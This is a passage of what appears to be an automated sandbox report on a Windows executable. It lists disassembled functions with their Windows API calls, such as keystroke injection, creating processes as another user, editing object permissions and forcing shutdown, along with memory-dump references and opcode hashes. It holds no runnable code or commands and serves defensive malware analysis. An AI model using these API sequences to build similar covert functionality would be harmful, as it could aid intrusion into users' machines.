                                      • ClientToScreen.USER32(?,?), ref: 0047CC17
                                      • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                      • ReleaseCapture.USER32 ref: 0047CC3A
                                      • GetCursorPos.USER32(?), ref: 0047CC72
                                      • ScreenToClient.USER32(?,?), ref: 0047CC80
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                      • SendMessageW.USER32 ref: 0047CD12
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                      • SendMessageW.USER32 ref: 0047CD80
                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                      • GetCursorPos.USER32(?), ref: 0047CDC8
                                      • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                      • GetParent.USER32(00000000), ref: 0047CDF7
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                      • SendMessageW.USER32 ref: 0047CE93
                                      • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,00B31B98,00000000,?,?,?,?), ref: 0047CF1C
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                      • SendMessageW.USER32 ref: 0047CF6B
                                      • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,00B31B98,00000000,?,?,?,?), ref: 0047CFE6
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                      • String ID: @GUI_DRAGID$F
                                      • API String ID: 3100379633-4164748364
                                      • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                      • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                      • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                      • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                      Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 00434420
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                      • IsIconic.USER32(?), ref: 0043444F
                                      • ShowWindow.USER32(?,00000009), ref: 0043445C
                                      • SetForegroundWindow.USER32(?), ref: 0043446A
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                      • GetCurrentThreadId.KERNEL32 ref: 00434485
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                      • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                      • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                      • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                      • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                      • keybd_event.USER32(00000012,00000000), ref: 00434514
                                      • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                      • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 2889586943-2988720461
                                      • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                      • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                      • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                      • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                      Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                      • CloseHandle.KERNEL32(?), ref: 004463A0
                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                      • GetProcessWindowStation.USER32 ref: 004463D1
                                      • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                      • _wcslen.LIBCMT ref: 00446498
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • _wcsncpy.LIBCMT ref: 004464C0
                                      • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                      • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                      • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                      • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                      • CloseWindowStation.USER32(00000000), ref: 0044656C
                                      • CloseDesktop.USER32(?), ref: 0044657A
                                      • SetProcessWindowStation.USER32(?), ref: 00446588
                                      • CloseHandle.KERNEL32(?), ref: 00446592
                                      • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                      • String ID: $@OH$default$winsta0
                                      • API String ID: 3324942560-3791954436
                                      • Opcode ID: 3855f31a7edb79db8fb6e054dab9a51317b7aa2e377abc436226fb5bcd8b5061
                                      • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                      • Opcode Fuzzy Hash: 3855f31a7edb79db8fb6e054dab9a51317b7aa2e377abc436226fb5bcd8b5061
                                      • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                      Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                      • FindClose.KERNEL32(00000000), ref: 00478924
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                      • __swprintf.LIBCMT ref: 004789D3
                                      • __swprintf.LIBCMT ref: 00478A1D
                                      • __swprintf.LIBCMT ref: 00478A4B
                                      • __swprintf.LIBCMT ref: 00478A79
                                        • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                        • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                      • __swprintf.LIBCMT ref: 00478AA7
                                      • __swprintf.LIBCMT ref: 00478AD5
                                      • __swprintf.LIBCMT ref: 00478B03
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                      • API String ID: 999945258-2428617273
                                      • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                      • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                      • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                      • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                      Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                      • __wsplitpath.LIBCMT ref: 00403492
                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                      • _wcscpy.LIBCMT ref: 004034A7
                                      • _wcscat.LIBCMT ref: 004034BC
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                        • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                        • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                      • _wcscpy.LIBCMT ref: 004035A0
                                      • _wcslen.LIBCMT ref: 00403623
                                      • _wcslen.LIBCMT ref: 0040367D
                                      Strings
                                      • _, xrefs: 0040371C
                                      • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                      • Unterminated string, xrefs: 00428348
                                      • Error opening the file, xrefs: 00428231
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                      • API String ID: 3393021363-188983378
                                      • Opcode ID: 2389ec669d452b0a5adfbe169eecf0b3fb7fa3ab3e44055c90c6d509db71674e
                                      • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                      • Opcode Fuzzy Hash: 2389ec669d452b0a5adfbe169eecf0b3fb7fa3ab3e44055c90c6d509db71674e
                                      • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                      Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                      • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                      • FindClose.KERNEL32(00000000), ref: 00431B20
                                      • FindClose.KERNEL32(00000000), ref: 00431B34
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                      • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                      • FindClose.KERNEL32(00000000), ref: 00431BCD
                                      • FindClose.KERNEL32(00000000), ref: 00431BDB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                      • String ID: *.*
                                      • API String ID: 1409584000-438819550
                                      • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                      • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                      • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                      • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                      Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                      • FindClose.KERNEL32(00000000), ref: 0044291C
                                      • FindClose.KERNEL32(00000000), ref: 00442930
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                      • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                      • FindClose.KERNEL32(00000000), ref: 004429D4
                                        • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                      • FindClose.KERNEL32(00000000), ref: 004429E2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                      • String ID: *.*
                                      • API String ID: 2640511053-438819550
                                      • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                      • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                      • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                      • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                      Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                      • GetLastError.KERNEL32 ref: 00433414
                                      • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                      • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                      • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                      • String ID: SeShutdownPrivilege
                                      • API String ID: 2938487562-3733053543
                                      • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                      • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                      • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                      • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                      Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                        • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                        • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                        • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                      • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                      • GetLengthSid.ADVAPI32(?), ref: 00446241
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                      • CopySid.ADVAPI32(00000000), ref: 00446271
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                      • String ID:
                                      • API String ID: 1255039815-0
                                      • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                      • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                      • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                      • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                      Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                      Download Yara Rule
                                      APIs
                                      • __swprintf.LIBCMT ref: 00433073
                                      • __swprintf.LIBCMT ref: 00433085
                                      • __wcsicoll.LIBCMT ref: 00433092
                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                      • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                      • LockResource.KERNEL32(00000000), ref: 004330CA
                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                      • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                      • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                      • LockResource.KERNEL32(?), ref: 00433120
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                      • String ID:
                                      • API String ID: 1158019794-0
                                      • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                      • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                      • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                      • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                      Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
